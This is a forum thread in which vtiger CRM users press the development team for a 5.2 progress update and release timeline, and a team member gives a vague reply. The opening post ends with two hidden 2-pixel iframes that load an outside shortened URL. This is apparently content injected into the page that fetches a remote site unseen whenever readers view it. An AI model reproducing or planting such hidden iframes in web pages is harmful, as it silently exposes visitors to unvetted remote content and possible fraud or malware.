vtiger 5.2 update?

To the vtiger team.

I had a look at the project page for 5.2(<!-- m --><a class="postlink" href="http://wiki.vtiger.com/index.php/5.2_Project_Page">http://wiki.vtiger.com/index.php/5.2_Project_Page</a><!-- m -->) there has been no activity for a while "This page was last modified on 5 January 2010" taken from the bottom of the page.

would be nice to get an update and timeline for finale release date for 5.2

Thanks for the all th great work vtiger team! <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

  • not sure about the new features, but there is some good movement on bug fixing side, as per the recent updates on the trac.
  • yes, a general update about the progress of 5.2. is welcome. i do not have the time to go and look into the details of the trac. something in the lines of "5.2. xx% complete, target release date: xxx" would be informative.
  • vtiger team any feedback?
  • its been almost a month, and still no response from vtiger team?

    is anybody out there?

-still no update on the 5.2 project page.
    -no reply/input to this topic
-no updates on the vtiger blog since the 10th feb

i love the vtiger project and the work you guys do. please a little communication goes a long way!
  • i hope its not the ego coming in your way, otherwise howz it possible that people are almost begging for update and you don't even acknowledge their message.

and you see anyone who asks for update always tries to please vtiger by saying good words about the software and the work you guys are doing, as if they don't do that vtiger will take away the system from them.

most or rather all the successful community driven projects are by the most humble guys, we can ever find of internet.

no matter how busy you guys are, if you have a community driven project, you should spend at least 10-20% of your time doing communicating to the community.

i hope you understand and act on my advice, else you'll end up killing this whole great work done over many years.

    regards,
  • there are several new initiatives picked up aside from the ongoing development of the product, which includes boosting the framework, experimenting with better performance, learning from community developed modules etc...

due to these involvements, we are seeking help from experienced and active community members to take up the discussions, which they do more promptly as any vtiger team member will.

good point, we are devoting more time than expected in reviewing the discussions, do not worry.

having core team focus on strengthening the product and community throw/discuss the ideas or share prototype implementation on the available product would prove greater use.

in terms of community, we equally respect the views of active members who would like to voice their messages in helping others.

  • hi prasad

thanks for the update sorry to keep pushing, i do appreciate the update, as i am sure the others do, but the feedback is very vague with no timeliness?

30min spent updating the 5.2 project page, and maybe a blog post on current vtiger activities will go along way with the community.

if you need specific help, i am sure myself or one of the other community members can assist?
